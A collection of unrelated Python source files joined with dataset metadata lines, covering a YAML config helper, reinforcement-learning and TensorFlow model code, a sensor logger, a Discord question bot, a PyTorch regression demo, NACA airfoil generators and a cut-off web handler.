self.__dict__ = dct
def todict(self):
dct = {}
for k, v in self.items():
if issubclass(type(v), DotDict):
v = v.todict()
dct[k] = v
return dct
class Config(DotDict):
@staticmethod
def yaml_load(path):
ret = yaml.safe_load(open(path, 'r', encoding='utf8'))
assert ret is not None, f'Config file {path} is empty.'
return Config(ret)
@staticmethod
def trans(inp, dep=0):
ret = ''
if issubclass(type(inp), dict):
for k, v in inp.items():
ret += f'\n{" "*dep}{k}: {Config.trans(v, dep+1)}'
elif issubclass(type(inp), list):
for v in inp:
ret += f'\n{" "*dep}- {v}'
else:
ret += f'{inp}'
return ret
def __init__(self, dct):
if type(dct) is str:
dct = Config.yaml_load(dct)
super().__init__(dct)
        try:
            self._name = dct['_name']
        except KeyError:
            self._name = 'Config'
def __str__(self):
return self.__repr__()
def __repr__(self):
ret = f'[{self._name}]'
ret += Config.trans(self)
#for k, v in self.items():
# if k[0] != '_':
# ret += f'\n {k:16s}: {Config.trans(v, 2)}'
return ret
def _apply_config(self, config, replace=False):
for k, v in config.items():
self[k] = v
def __getattr__(self, name):
try:
return self[name]
        except KeyError:
raise AttributeError(name)
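# Illustrative usage sketch (the file name and keys below are hypothetical, not from this repo):
#   cfg = Config('train.yaml')   # YAML is parsed into nested DotDicts
#   print(cfg.optimizer.lr)      # dot access works at any depth
#   plain = cfg.todict()         # convert back to plain nested dicts
#   print(cfg)                   # pretty-printed via Config.trans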
| 3.140625 | 3 |
examples/example_1.py | BoyuanLong/rlpyt | 0 | 12761610 |
"""
Runs one instance of the voxel environment and optimizes using the R2D1 algorithm
with an asynchronous GPU sampler, so sampling and training run in separate
processes (this example was adapted from a serial DQN script).
The kwarg snapshot_mode="last" to logger context will save the latest model at
every log point (see inside the logger for other options).
In viskit, whatever (nested) key-value pairs appear in config will become plottable
keys for showing several experiments. If you need to add more after an experiment,
use rlpyt.utils.logging.context.add_exp_param().
"""
from rlpyt.runners.async_rl import AsyncRlEval
from rlpyt.samplers.serial.sampler import SerialSampler
from rlpyt.envs.atari.atari_env import AtariEnv, AtariTrajInfo
from rlpyt.algos.dqn.dqn import DQN
from rlpyt.agents.dqn.atari.atari_dqn_agent import AtariDqnAgent
from rlpyt.runners.minibatch_rl import MinibatchRlEval
from rlpyt.utils.logging.context import logger_context
# R2D1
from rlpyt.samplers.parallel.gpu.sampler import GpuSampler
from rlpyt.samplers.parallel.gpu.collectors import GpuWaitResetCollector
from rlpyt.samplers.async_.gpu_sampler import AsyncGpuSampler
from rlpyt.samplers.async_.collectors import DbGpuResetCollector
from examples.voxel_r2d1 import configs
from rlpyt.algos.dqn.r2d1 import R2D1
from rlpyt.runners.minibatch_rl import MinibatchRl
from rlpyt.agents.dqn.atari.atari_r2d1_agent import AtariR2d1Agent
from rlpyt.utils.launching.affinity import affinity_from_code, encode_affinity, quick_affinity_code
# Voxel
from rlpyt.envs.gym import voxel_make
def build_and_train(game="TowerBuilding", run_ID=0, cuda_idx=None):
    # Manually set the resources for the experiment:
affinity_code = encode_affinity(
n_cpu_core=2,
n_gpu=1,
# hyperthread_offset=8, # if auto-detect doesn't work, number of CPU cores
# n_socket=1, # if auto-detect doesn't work, can force (or force to 1)
run_slot=0,
cpu_per_run=1,
set_affinity=True, # it can help to restrict workers to individual CPUs
)
affinity = affinity_from_code(affinity_code)
config = configs["r2d1"]
config["env"]["game"] = game
config["eval_env"]["game"] = config["env"]["game"]
sampler = AsyncGpuSampler(
EnvCls=voxel_make,
env_kwargs=config["env"],
CollectorCls=DbGpuResetCollector,
TrajInfoCls=AtariTrajInfo,
eval_env_kwargs=config["eval_env"],
**config["sampler"]
)
algo = R2D1(optim_kwargs=config["optim"], **config["algo"])
agent = AtariR2d1Agent(model_kwargs=config["model"], **config["agent"])
runner = AsyncRlEval(
algo=algo,
agent=agent,
sampler=sampler,
affinity=affinity,
**config["runner"]
)
config = dict(game=game)
name = "r2d1_" + game
log_dir = "tower_building"
with logger_context(log_dir, run_ID, name, config, snapshot_mode="last"):
runner.train()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--game', help='Voxel game', default='TowerBuilding')
parser.add_argument('--run_ID', help='run identifier (logging)', type=int, default=0)
parser.add_argument('--cuda_idx', help='gpu to use ', type=int, default=None)
args = parser.parse_args()
build_and_train(
game=args.game,
run_ID=args.run_ID,
cuda_idx=args.cuda_idx,
)
| 2.25 | 2 |
research/cvt_text/task_specific/word_level/tagging_module.py | jdavidagudelo/tensorflow-models | 1 | 12761611 | # Copyright 2018 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Sequence tagging module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from research.cvt_text.corpus_processing import minibatching
from research.cvt_text.model import model_helpers
from research.cvt_text.model import task_module
class TaggingModule(task_module.SemiSupervisedModule):
def __init__(self, config, task_name, n_classes, inputs,
encoder):
super(TaggingModule, self).__init__()
self.task_name = task_name
self.n_classes = n_classes
self.labels = labels = tf.placeholder(tf.float32, [None, None, None],
name=task_name + '_labels')
class PredictionModule(object):
def __init__(self, name, input_reprs, roll_direction=0, activate=True):
self.name = name
with tf.variable_scope(name + '/predictions'):
projected = model_helpers.project(input_reprs, config.projection_size)
if activate:
projected = tf.nn.relu(projected)
self.logits = tf.layers.dense(projected, n_classes, name='predict')
targets = labels
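                # label smoothing: soften the one-hot targets toward the uniform distribution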
targets *= (1 - inputs.label_smoothing)
targets += inputs.label_smoothing / n_classes
self.loss = model_helpers.masked_ce_loss(
self.logits, targets, inputs.mask, roll_direction=roll_direction)
primary = PredictionModule('primary',
([encoder.uni_reprs, encoder.bi_reprs]))
ps = [
PredictionModule('full', ([encoder.uni_reprs, encoder.bi_reprs]),
activate=False),
PredictionModule('forwards', [encoder.uni_fw]),
PredictionModule('backwards', [encoder.uni_bw]),
PredictionModule('future', [encoder.uni_fw], roll_direction=1),
PredictionModule('past', [encoder.uni_bw], roll_direction=-1),
]
self.unsupervised_loss = sum(p.loss for p in ps)
self.supervised_loss = primary.loss
self.probs = tf.nn.softmax(primary.logits)
self.preds = tf.argmax(primary.logits, axis=-1)
def update_feed_dict(self, feed, mb):
if self.task_name in mb.teacher_predictions:
feed[self.labels] = mb.teacher_predictions[self.task_name]
elif mb.task_name != 'unlabeled':
labels = minibatching.build_array(
[[0] + e.labels + [0] for e in mb.examples])
feed[self.labels] = np.eye(self.n_classes)[labels]
| 1.984375 | 2 |
plant/run.py | zhijiahu/gopigo-car | 2 | 12761612 | <reponame>zhijiahu/gopigo-car<filename>plant/run.py
import time
from datetime import datetime
import grovepi
import yaml
from elasticsearch import Elasticsearch
from MoistureDetector import MoistureDetector  # assumes the local module defines a class of the same name
def main():
with open('config.yaml', 'r') as config_file:
        config = yaml.safe_load(config_file)
es = Elasticsearch([config['es']['url']])
es_alias_name = 'moisture-index'
detector = MoistureDetector(port=0)
interval = 5 * 60
led = 5
grovepi.pinMode(led,"OUTPUT")
grovepi.ledBar_init(led, 0)
while True:
try:
moisture, condition = detector.read_moisture_value()
doc = {
'moisture' : moisture,
'condition': condition,
'timestamp': datetime.utcnow()
}
es_index_name = "{}-{}".format(es_alias_name, datetime.now().strftime("%Y%m"))
if not es.indices.exists(es_index_name):
es.indices.create(index=es_index_name)
res = es.index(index=es_index_name, body=doc)
print(res)
            led_brightness = min(int(moisture / 300 * 10) + 1, 10)  # clamp to the LED bar's 10 segments
grovepi.ledBar_setLevel(led, led_brightness)
            # Alert @ 7am local time (hour 23 in UTC here); alerting is not implemented yet
now = datetime.utcnow()
if now.hour == 23 and condition == "DRY":
pass
time.sleep(interval)
except KeyboardInterrupt:
break
if __name__ == "__main__":
try:
main()
    except IOError as error:
        print(str(error))
exit(1)
exit(0)
| 2.640625 | 3 |
envs/dangerous_path_env.py | Miffyli/policy-supervectors | 17 | 12761613 | # A simple MDP where agent has to traverse a specific path
# in gridworld - wrong action will throw player back to start or do nothing.
# Player is rewarded for reaching new maximum length in the episode.
#
# State is represented by a positive ndim vector that tells
# where the player is. This is designed to mimic coordinate-systems
# and also deliberately confuse networks (e.g. might think higher value
# on axis 0 means we should take one specific action always)
#
import random
from typing import List, Tuple
import numpy as np
import gym
# Fix for older gym versions
import gym.spaces
def generate_path(game_length: int, ndim: int, num_mines: int, seed: int = 42) -> Tuple[List[int], List[List[int]]]:
"""Generate the path player has to follow.
Args:
game_length: Length of the path to generate
ndim: Number of dimensions in the environment
num_mines: Number of mines per step
seed: Seed used to generate path
Returns:
path: List of ints, representing actions player should take in each state.
mines: List of List of ints, representing which actions are mines in each state.
"""
path = []
mines = []
gen = np.random.default_rng(seed)
for i in range(game_length):
action_ordering = gen.permutation(ndim)
# First item goes to path, next num_mines go to mines
path.append(action_ordering[0].item())
mines.append(action_ordering[1:1 + num_mines].tolist())
return path, mines
class DangerousPathEnv(gym.Env):
"""
A N-dimensional environment where player has to choose
the exact correct action at any given location (follow
a very specific path). Otherwise game terminates or player stays
still, depending on if they hit a mine or not.
If `discrete_obs` is True, observation space tells location
of player in path. If False, uses continuous observations
that tell coordinate-like information of location of the player.
`mine_ratio` specifies the amount of mines (terminal states) versus
no-move moves per state.
"""
def __init__(
self,
game_length=100,
ndim=2,
seed=42,
discrete_obs=False,
random_action_p=0.0,
mine_ratio=1.0
):
super().__init__()
self.game_length = game_length
self.ndim = ndim
self.mine_ratio = mine_ratio
        self.num_mines_per_step = int(np.floor(ndim * mine_ratio))
        self.path, self.mines = generate_path(game_length, ndim, self.num_mines_per_step, seed)
        # Empirically found to be a necessary adjustment
self.step_size = 1.0
self.discrete_obs = discrete_obs
self.random_action_p = random_action_p
if discrete_obs:
self.observation_space = gym.spaces.Discrete(n=self.game_length)
else:
self.observation_space = gym.spaces.Box(0, 1, shape=(self.ndim,))
self.action_space = gym.spaces.Discrete(n=self.ndim)
self.path_location = 0
self.max_path_location = 0
self.num_steps = 0
self.player_location = np.zeros((self.ndim,))
def step(self, action):
if self.random_action_p > 0.0 and random.random() < self.random_action_p:
action = self.action_space.sample()
done = False
reward = 0
action = int(action)
if action == self.path[self.path_location]:
# You chose wisely
self.path_location += 1
# Only reward progressing once
if self.path_location > self.max_path_location:
reward = 1
self.max_path_location += 1
# Small step sizes
self.player_location[action] += self.step_size
if self.path_location == (self.game_length - 1):
done = True
else:
# You chose poorly
reward = 0
if action in self.mines[self.path_location]:
# You chose very poorly, back to start
self.path_location = 0
self.player_location = np.zeros((self.ndim,))
self.num_steps += 1
if self.num_steps >= self.game_length:
done = True
return self.path_location if self.discrete_obs else self.player_location, reward, done, {}
def reset(self):
self.path_location = 0
self.max_path_location = 0
self.num_steps = 0
self.player_location = np.zeros((self.ndim,))
return self.path_location if self.discrete_obs else self.player_location
def seed(self, seed):
        self.path, self.mines = generate_path(self.game_length, self.ndim, self.num_mines_per_step, seed)
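# Minimal rollout sketch (the hyperparameters here are illustrative, not from the original experiments):
if __name__ == "__main__":
    env = DangerousPathEnv(game_length=20, ndim=4, seed=0)
    obs = env.reset()
    done, episode_return = False, 0
    while not done:
        obs, reward, done, _ = env.step(env.action_space.sample())
        episode_return += reward
    print("random-policy return:", episode_return)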
| 3.59375 | 4 |
tests/__init__.py | Merkll/PPM | 0 | 12761614 | from tests import setUpTest
| 0.984375 | 1 |
linear_regression.py | abhishekbhakat/pyML | 0 | 12761615 | <gh_stars>0
import numpy as np
import torch
import torch.nn as nn
from torch.utils.data import TensorDataset
from torch.utils.data import DataLoader
import torch.nn.functional as F
# Input (temp, rainfall, humidity)
inputs = np.array([[73, 67, 43], [91, 88, 64], [87, 134, 58],
[102, 43, 37], [69, 96, 70], [73, 67, 43],
[91, 88, 64], [87, 134, 58], [102, 43, 37],
[69, 96, 70], [73, 67, 43], [91, 88, 64],
[87, 134, 58], [102, 43, 37], [69, 96, 70]],
dtype='float32')
# Targets (apples, oranges)
targets = np.array([[56, 70], [81, 101], [119, 133],
[22, 37], [103, 119], [56, 70],
[81, 101], [119, 133], [22, 37],
[103, 119], [56, 70], [81, 101],
[119, 133], [22, 37], [103, 119]],
dtype='float32')
inputs = torch.from_numpy(inputs)
targets = torch.from_numpy(targets)
# Define dataset
train_ds = TensorDataset(inputs, targets)
train_ds[0:3]
# Define data loader
batch_size = 5
train_dl = DataLoader(train_ds, batch_size, shuffle=True)
# Define model
model = nn.Linear(3, 2)
# print(model.weight)
# print(model.bias)
# list(model.parameters())
preds = model(inputs)  # initial (untrained) predictions, kept for inspection
loss_fn = F.mse_loss
loss = loss_fn(model(inputs), targets)
print(loss)
opt = torch.optim.SGD(model.parameters(), lr=1e-5)
def fit(num_epochs, model, loss_fn, opt, train_dl):
# Repeat for given number of epochs
for epoch in range(num_epochs):
# Train with batches of data
for xb,yb in train_dl:
# 1. Generate predictions
pred = model(xb)
# 2. Calculate loss
loss = loss_fn(pred, yb)
# 3. Compute gradients
loss.backward()
# 4. Update parameters using gradients
opt.step()
# 5. Reset the gradients to zero
opt.zero_grad()
# Print the progress
if (epoch+1) % 10 == 0:
print('Epoch [{}/{}], Loss: {:.4f}'.format(epoch+1, num_epochs, loss.item()))
fit(100, model, loss_fn, opt, train_dl) | 2.3125 | 2 |
pycdt/utils/tests/test_plotter.py | hitarth64/pycdt | 0 | 12761616 | # coding: utf-8
from __future__ import division
__author__ = "<NAME>"
__copyright__ = "Copyright 2017, The Materials Project"
__version__ = "1.0"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Development"
__date__ = "July 19, 2017"
import os
from pymatgen.core import Element
from pymatgen.core.structure import PeriodicSite, Structure, Lattice
# from pymatgen.entries.computed_entries import ComputedStructureEntry
from pymatgen.util.testing import PymatgenTest
from pymatgen.analysis.defects.core import Vacancy, DefectEntry
from pymatgen.analysis.defects.thermodynamics import DefectPhaseDiagram
from pycdt.utils.plotter import DefectPlotter
# from pycdt.core.defects_analyzer import ComputedDefect, DefectsAnalyzer
class DefectPlotterTest(PymatgenTest):
def setUp(self):
l = Lattice([[3.52,0.0,2.033], [1.174,3.32,2.033], \
[0.0,0.0,4.066]])
s_bulk = Structure(l, ['Ga', 'As'], \
[[0.0000, 0.0000, 0.0000], \
[0.2500, 0.2500, 0.2500]])
defect_site = PeriodicSite( 'As', [0.25, 0.25, 0.25], l)
defect = Vacancy( s_bulk, defect_site, charge = 1.)
defect_entry = DefectEntry( defect, 0.)
entries = [defect_entry]
vbm = 0.2
band_gap = 1.
dpd = DefectPhaseDiagram( entries, vbm, band_gap)
self.dp = DefectPlotter(dpd)
def test_get_plot_form_energy(self):
mu_elts = {Element('As'): 0, Element('Ga'): 0}
self.dp.get_plot_form_energy(mu_elts).savefig('test.pdf')
self.assertTrue(os.path.exists('test.pdf'))
os.system('rm test.pdf')
# def test_plot_conc_temp(self):
# self.dp.plot_conc_temp().savefig('test.pdf')
# self.assertTrue(os.path.exists('test.pdf'))
# os.system('rm test.pdf')
#
# def test_plot_carriers_ef(self):
# self.dp.plot_carriers_ef().savefig('test.pdf')
# self.assertTrue(os.path.exists('test.pdf'))
# os.system('rm test.pdf')
# def tearDown(self):
# self.da
import unittest
if __name__ == '__main__':
unittest.main()
| 1.914063 | 2 |
main.py | AntonStrickland/Goldbar-Discussion-Bot | 0 | 12761617 | import globals
from discussion_question_manager import DiscussionQuestionManager
import pickle
import discord
from discord.channel import TextChannel
from discord.message import Message
from discord.ext import tasks
from discord import RawReactionActionEvent as RawReaction
import logging
import os
import asyncio
logger: logging.Logger
class Client(discord.Client):
# TODO
# have people DM the bot, then the bot DMs me, and I react to the question in the DM with the bot
# which i guess I should have a way to toggle off "who asked the question" if they want to be anonymous
manager: DiscussionQuestionManager = DiscussionQuestionManager()
async def on_ready(self):
print("READY!!")
await self.start_message_loop()
# people react to message to add/remove themself from the list of people to be notified
# if they are already added, they are removed. else they are added.
async def change_notifiee(self, reaction: RawReaction):
# if we're in test mode
if globals.TEST_MODE:
# check if the msg is the same as the designated test one
if reaction.message_id != globals.TEST_REACTION_MSG_ID:
return
# otherwise
else:
            # check if it's the same as the designated real one
if reaction.message_id != globals.ACTUAL_REACTION_MSG_ID:
return
if reaction.user_id != globals.KINJO_ID: # don't care if kinjo's reacting, he will always be notified
self.manager.change_notifiee(reaction.user_id)
async def add_question(self, reaction: RawReaction):
# if we're testing, allow me and kinjo
if globals.TEST_MODE:
if reaction.member.id not in globals.ALLOWED_IDS:
return
# if we're live, only allow kinjo
else:
if reaction.member.id != globals.KINJO_ID:
return
channel: TextChannel = await self.fetch_channel(reaction.channel_id)
msg: Message = await channel.fetch_message(reaction.message_id)
# add new question to manager
self.manager.add_question_from_msg(msg)
async def on_raw_reaction_add(self, reaction: RawReaction):
if reaction.event_type != "REACTION_ADD":
return
if reaction.emoji.name == "kaneko_ok":
await self.change_notifiee(reaction)
if reaction.emoji.name == "✅":
await self.add_question(reaction)
# save updated manager to file
with open("manager.txt", "wb") as f:
pickle.dump(self.manager, f)
async def on_raw_reaction_remove(self, reaction: RawReaction):
if reaction.event_type != "REACTION_REMOVE":
return
if reaction.emoji.name == "kaneko_ok":
await self.change_notifiee(reaction)
# save updated manager to file
with open("manager.txt", "wb") as f:
pickle.dump(self.manager, f)
async def start_message_loop(self):
while True:
if globals.TEST_MODE:
await asyncio.sleep(globals.TEST_MESSAGE_DELAY_S)
else:
await asyncio.sleep(globals.ACTUAL_MESSAGE_DELAY_S)
msg = str(self.manager)
if globals.TEST_MODE:
channel = await self.fetch_channel(globals.TEST_CHANNEL)
else:
channel = await self.fetch_channel(globals.ACTUAL_CHANNEL)
await channel.send(msg)
with open("manager.txt", "wb") as f:
pickle.dump(self.manager, f)
def main():
# set up logging
logger = logging.getLogger('discord')
logger.setLevel(logging.DEBUG)
handler = logging.FileHandler(filename='discord.log', encoding='utf-8', mode='w')
handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))
logger.addHandler(handler)
# set up environment tokens
try:
token = os.environ["GOLDBAR_BOT_TOKEN"]
except KeyError as e:
print(f"Token {e} not found. Please set your environment variable properly. See README. Exiting.")
exit()
intents = discord.Intents.default() # choose intents
client = Client(intents=intents) # make bot object
with open("manager.txt", "rb") as f: # load existing question manager, if any
try:
client.manager = pickle.load(f)
except EOFError:
pass
# start bot
client.run(token)
if __name__ == "__main__":
main() | 2.53125 | 3 |
c19_code/plot.py | datajms/COVID19_attribution | 0 | 12761618 | ## Some utils for plots
clean_variable_names = {
"age": "Age",
"anosmia": "Anosmia",
"cough": "Cough",
"diarrhea": "Diarrhea",
"fever": "Fever",
"minor_severity_factor": "Number of minor severity factors",
"risk_factor": "Number of risk factors",
"sore_throat_aches": "Sore throat/aches",
}
legend_imp_name = {
"SOBOL_TOTAL": "Sobol Total-order",
"SHAPLEY_EFFECT": "Shapley Effects",
"SHAP_IMPORTANCE": "Shap Importance",
"AVERAGE_IMPORTANCE": "Average Importance",
}
color_imp_name = {
"SOBOL_TOTAL": "rgb(192,233,231)",
"SHAPLEY_EFFECT": "rgb(252,236,147)",
"SHAP_IMPORTANCE": "rgb(227,142,139)",
"AVERAGE_IMPORTANCE": "rgb(56,108,176)",
}
x_axis_setting_tick = dict(
title="Normalized importances (%)",
titlefont_size=12,
tickfont_size=10,
range=[0, 30],
tick0=0,
dtick=5,
showgrid=True,
gridwidth=1,
gridcolor="rgb(230,230,230)",
showline=True,
linecolor="black",
mirror=True,
)
x_axis_setting = dict(
tickfont_size=10,
range=[0, 30],
tick0=0,
dtick=5,
showgrid=True,
gridwidth=1,
gridcolor="rgb(230,230,230)",
showline=True,
linecolor="black",
mirror=True,
)
y_axis_setting = dict(tickfont_size=10, showline=True, linecolor="black", mirror=True)
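# Illustrative use with plotly (the figure construction is an assumption; only the dicts above come from this file):
# import plotly.graph_objects as go
# fig = go.Figure(layout=dict(xaxis=x_axis_setting_tick, yaxis=y_axis_setting))
# fig.update_layout(legend_title_text=legend_imp_name["SHAP_IMPORTANCE"])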
| 1.890625 | 2 |
grid_generator/naca_4digit_test.py | Mayu14/2D_comp_viscos | 1 | 12761619 | # coding: utf-8
import numpy as np
import matplotlib.pyplot as plt
class Naca_4_digit(object):
def __init__(self, int_4, attack_angle_deg, resolution, quasi_equidistant=True, length_adjust=False, from5digit=False):
if from5digit == False:
self.m = float(int_4[0]) / 100 # maximum camber
self.p = float(int_4[1]) / 10 # position of the maximum camber
self.t = float(int_4[2:4]) / 100 # maximum thickness
self.load_setting(attack_angle_deg, resolution, quasi_equidistant, length_adjust)
        if from5digit == False:
            # Naca_5_digit computes its own camber line before delegating here;
            # recomputing with the 4-digit formulas would overwrite it
            self.__y_c()
            self.__dyc_dx()
self.__y_t()
self.theta = np.arctan(self.dyc_dx)
self.get_surface()
if quasi_equidistant == True:
self.get_quasi_equidistant_line()
def load_setting(self, attack_angle_deg, resolution, quasi_equidistant=True, length_adjust=False):
self.use_quasi_equidistant = quasi_equidistant
self.reshape = length_adjust
if quasi_equidistant == True:
self.resolution = 100 * resolution
else:
self.resolution = resolution
self.new_resolution = resolution
self.attack_angle = attack_angle_deg
self.x = np.linspace(start = 0, stop = 1, num = self.resolution)
def __y_c(self):
x_lt_p = lambda m, p, x: m / (p ** 2) * (2.0 * p * x - x ** 2)
x_ge_p = lambda m, p, x: m / ((1 - p) ** 2) * ((1.0 - 2.0 * p) + 2.0 * p * x - x ** 2)
m = self.m
p = self.p
x = self.x
if ((p != 0) and (p != 1)):
self.y_c = np.where(x < p, x_lt_p(m, p, x), x_ge_p(m, p, x))
elif (p == 0):
self.y_c = m * (1.0 - x**2)
elif (p == 1):
self.y_c = m * (2.0 * x - x ** 2)
def __y_t(self):
t = self.t
x = self.x
self.y_t = t / 0.2 * (0.2969 * np.sqrt(x) - 0.1260 * x - 0.3516 * x**2 + 0.2843 * x**3 - 0.1015 * x**4)
def __dyc_dx(self):
x_lt_p = lambda m, p, x: 2.0 * m / (p ** 2) * (p - x)
x_ge_p = lambda m, p, x: 2.0 * m / ((1.0 - p) ** 2) * (p - x)
m = self.m
p = self.p
x = self.x
if ((p != 0) and (p != 1)):
self.dyc_dx = np.where(x < p, x_lt_p(m, p, x), x_ge_p(m, p, x))
elif (p == 0):
self.dyc_dx = - 2.0 * m * x
elif (p == 1):
self.dyc_dx = 2.0 * m * (1.0 - x)
def get_surface(self):
# original NACA-4digit wings
# upper
vec_l = np.full((3, self.resolution), 1.0)
vec_u = np.full((3, self.resolution), 1.0)
vec_u[0] = self.x - self.y_t * np.sin(self.theta) - 0.5
vec_u[1] = self.y_c + self.y_t * np.cos(self.theta)
# lower
vec_l[0] = self.x + self.y_t * np.sin(self.theta) - 0.5
vec_l[1] = self.y_c - self.y_t * np.cos(self.theta)
attack_angle = self.attack_angle / 180 * (np.pi)
rotMat = np.array([[np.cos(attack_angle), np.sin(attack_angle), 0], [- np.sin(attack_angle), np.cos(attack_angle), 0], [0, 0, 1]])
rot_l = rotMat.dot(vec_l)
rot_u = rotMat.dot(vec_u)
if self.reshape == True:
x_min = min(np.min(rot_l[0]), np.min(rot_u[0]))
x_max = max(np.max(rot_l[0]), np.max(rot_u[0]))
rate = 1.0 / (x_max - x_min)
if rate != 1.0:
expMat = np.array([[rate, 0, 0], [0, rate, 0], [0, 0, 1]])
rot_l = expMat.dot(rot_l)
rot_u = expMat.dot(rot_u)
self.x_l = rot_l[0] + 0.5
self.y_l = rot_l[1] + 0.5
self.x_u = rot_u[0] + 0.5
self.y_u = rot_u[1] + 0.5
def plot(self):
plt.xlim([0, 1])
plt.ylim([0, 1])
plt.plot(self.x_u, self.y_u)
plt.plot(self.x_l, self.y_l)
plt.show()
def get_quasi_equidistant_line(self):
new_resolution = self.new_resolution
x_min = min(np.min(self.x_u), np.min(self.x_l))
x_max = max(np.max(self.x_u), np.max(self.x_l))
if self.reshape == False:
self.equidistant_x = np.linspace(start = 0, stop = 1, num = new_resolution)
else:
self.equidistant_x = np.linspace(start=x_min, stop=x_max, num=new_resolution)
self.equidistant_y_l = np.zeros(new_resolution)
self.equidistant_y_u = np.zeros(new_resolution)
for index in range(new_resolution):
if ((x_min <= self.equidistant_x[index]) and (x_max >= self.equidistant_x[index])):
self.equidistant_y_l[index] = self.y_l[np.argmin(np.abs(self.x_l - self.equidistant_x[index]))]
self.equidistant_y_u[index] = self.y_u[np.argmin(np.abs(self.x_u - self.equidistant_x[index]))]
else:
                self.equidistant_y_l[index] = -1.0  # sentinel for points outside the airfoil's x-range
self.equidistant_y_u[index] = -1.0
def plot_quasi_equidistant_shape(self):
plt.xlim([0, 1])
plt.ylim([0, 1])
plt.plot(self.equidistant_x, self.equidistant_y_u, "o")
plt.plot(self.equidistant_x, self.equidistant_y_l, "o")
plt.show()
def transform2complex(self):
z_u_reverse = (self.x_u + 1j * self.y_u)[::-1]
z_l = self.x_l + 1j * self.y_l
if self.use_quasi_equidistant == True:
return np.concatenate([z_u_reverse[::100], z_l[::100], z_u_reverse[0].reshape(-1)])
else:
if z_u_reverse[self.resolution - 1] == z_l[0]:
return np.concatenate([z_u_reverse, z_l[1:], z_u_reverse[0].reshape(-1)])
else:
return np.concatenate([z_u_reverse, z_l, z_u_reverse[0].reshape(-1)])
class Naca_5_digit(Naca_4_digit):
def __init__(self, int_5, attack_angle_deg, resolution, quasi_equidistant = True, length_adjust = False, from5digit = True):
self.cl = float(int_5[0])*(3.0/2.0) / 10 # designed lift_coefficient
self.p = float(int_5[1]) / 2.0 / 100 # position of the maximum camber
self.ref = int_5[2] # enable / disable reflect
self.t = float(int_5[3:5]) / 100.0 # maximum thickness
self.camberline_plofile = int(int_5[0:3])
self.camberline_plofile_table()
self.load_setting(attack_angle_deg, resolution, quasi_equidistant, length_adjust)
self.__y_c()
self.__dyc_dx()
super(Naca_5_digit, self).__init__(int_5, attack_angle_deg, resolution, quasi_equidistant = quasi_equidistant, length_adjust = length_adjust, from5digit = True)
def __y_c(self):
x_lt_m_nr = lambda m, k1, x: k1 / 6.0 * (x ** 3 - 3.0 * m * x ** 2 + m ** 2 * (3.0 - m) * x)
x_gt_m_nr = lambda m, k1, x: k1 / 6.0 * m ** 3 * (1.0 - x)
x_lt_m_rf = lambda m, k1, k2_k1, x: k1 / 6.0 * ((x - m)**3 - k2_k1 * (1.0-m)**3 * x - m**3 * x + m**3)
x_gt_m_rf = lambda m, k1, k2_k1, x: k1 / 6.0 * (k2_k1 * (x - m)**3 - k2_k1 * (1.0 - m)**3 * x - m**3 * x + m**3)
m = self.m
k1 = self.k1
x = self.x
if int(self.ref) == 0: # not reflected
self.y_c = np.where(x < m, x_lt_m_nr(m, k1, x), x_gt_m_nr(m, k1, x))
else:
k2_k1 = self.k2byk1
self.y_c = np.where(x < m, x_lt_m_rf(m, k1, k2_k1, x), x_gt_m_rf(m, k1, k2_k1, x))
def __dyc_dx(self):
x_lt_m_nr = lambda m, k1, x: k1 / 6.0 * (3.0 * x ** 2 - 6.0 * m * x + m ** 2 * (3.0 - m))
x_gt_m_nr = lambda m, k1, x: - k1 / 6.0 * m ** 3
x_lt_m_rf = lambda m, k1, k2_k1, x: k1 / 6.0 * (3.0 * (x - m) ** 2 - k2_k1 * (1.0 - m) ** 3 - m ** 3)
x_gt_m_rf = lambda m, k1, k2_k1, x: k1 / 6.0 * (3.0 * k2_k1 * (x - m) ** 2 - k2_k1 * (1.0 - m) ** 3 - m ** 3)
m = self.m
k1 = self.k1
x = self.x
if int(self.ref) == 0: # not reflected
self.dyc_dx = np.where(x < m, x_lt_m_nr(m, k1, x), x_gt_m_nr(m, k1, x))
else:
k2_k1 = self.k2byk1
self.dyc_dx = np.where(x < m, x_lt_m_rf(m, k1, k2_k1, x), x_gt_m_rf(m, k1, k2_k1, x))
def camberline_plofile_table(self):
if self.camberline_plofile == 210:
self.m = 0.058
self.k1 = 361.4
elif self.camberline_plofile == 220:
self.m = 0.126
self.k1 = 51.64
elif self.camberline_plofile == 230:
self.m = 0.2025
self.k1 = 15.957
elif self.camberline_plofile == 240:
self.m = 0.29
self.k1 = 6.643
elif self.camberline_plofile == 250:
self.m = 0.391
self.k1 = 3.230
elif self.camberline_plofile == 221:
self.m = 0.130
self.k1 = 51.990
self.k2byk1 = 0.000764
elif self.camberline_plofile == 231:
self.m = 0.217
self.k1 = 15.793
self.k2byk1 = 0.00677
elif self.camberline_plofile == 241:
self.m = 0.318
self.k1 = 6.520
self.k2byk1 = 0.0303
elif self.camberline_plofile == 251:
self.m = 0.441
self.k1 = 3.191
self.k2byk1 = 0.1355
else:
print("this type wing is not defined")
exit()
def main():
deg = 0.0
naca = Naca_4_digit(int_4="0012", attack_angle_deg=deg, resolution=100, quasi_equidistant=True, length_adjust=True)
naca.plot()
naca.plot_quasi_equidistant_shape()
naca = Naca_5_digit(int_5="23012", attack_angle_deg=deg, resolution=100, quasi_equidistant=True, length_adjust=True)
naca.plot()
naca.plot_quasi_equidistant_shape()
if __name__ == '__main__':
main()
| 2.375 | 2 |
handlers/base_handler.py | Krishna10798/Multi-User-Blog | 5 | 12761620 | import webapp2
import os
import jinja2
from utility import check_secure_val, filterKey, showCount
from models import User
template_dir = os.path.join(os.path.dirname(__file__), '../views')
jinja_env = jinja2.Environment(loader=jinja2.FileSystemLoader(template_dir),
autoescape=True)
jinja_env.filters['filterKey'] = filterKey
jinja_env.filters['showCount'] = showCount
def render_str(template, **params):
